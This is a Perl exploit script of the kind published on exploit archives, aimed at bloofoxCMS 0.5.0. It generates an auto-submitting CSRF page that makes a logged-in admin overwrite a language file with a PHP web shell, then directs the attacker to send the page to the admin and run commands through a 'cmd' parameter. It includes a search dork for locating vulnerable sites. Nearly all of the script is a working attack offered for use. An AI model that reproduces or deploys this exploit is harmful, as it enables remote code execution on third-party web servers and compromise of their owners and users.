bloofoxCMS 0.5.0 CSRF / PHP Code Injection

1. #!/usr/bin/perl
2. ########################################################################
3. # Title : bloofoxCMS V0.5.0 - Csrf inject php code
4. # Author : AtT4CKxT3rR0r1ST
5. # Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
6. # Home : http://www.iphobos.com/blog/
7. # Script : http://www.bloofox.com/download.21.html
8. # Version : 0.5.0
9. # Dork : "Powered by bloofoxCMS"
10. # Vulnerability In Languages Editor
11. # Note : Can Edit Any File Php In Script Just Change Value[Director/file]
12. In Fileurl
13. use LWP::UserAgent;
14. use LWP::Simple;
15. system("cls");
16. print "|----------------------------------------------------|\n";
17. print "| bloofoxCMS V0.5.0 - Csrf inject php code |\n";
18. print "| Coded by : AtT4CKxT3rR0r1ST |\n";
19. print "| GREATS TO MY LOVE |\n";
20. print "|----------------------------------------------------|\n";
21. sleep(2);
22. print "\nInsert Target:";
23. $h = <STDIN>;
24. chomp $h;
25. $html = '<html>
26. <body onload="document.form0.submit();">
27. <form method="POST" name="form0"
28. action="'.$h.'/admin/index.php?mode=settings&page=editor">
29. <input type="hidden" name="file" value=" <?php system($_GET[cmd]); ?> "
30. <input type="hidden" name="fileurl" value="languages/deutsch.php"/>
31. <input type="hidden" name="fileurl" value="../languages/deutsch.php"/>
32. <input type="hidden" name="send" value="Save"/>
33. </form>
34. </body>
35. </html>';
36. sleep(1);
37. print "Createing Done ...\n";
38. open(XSS , '>>csrf.html');
39. print XSS $html;
40. close(XSS);
41. print "Now Send csrf.html To Admin \n";
42. sleep(1);
43. print "To Exploit [http://site/languages/deutsch.php?cmd= COMMAND] \n";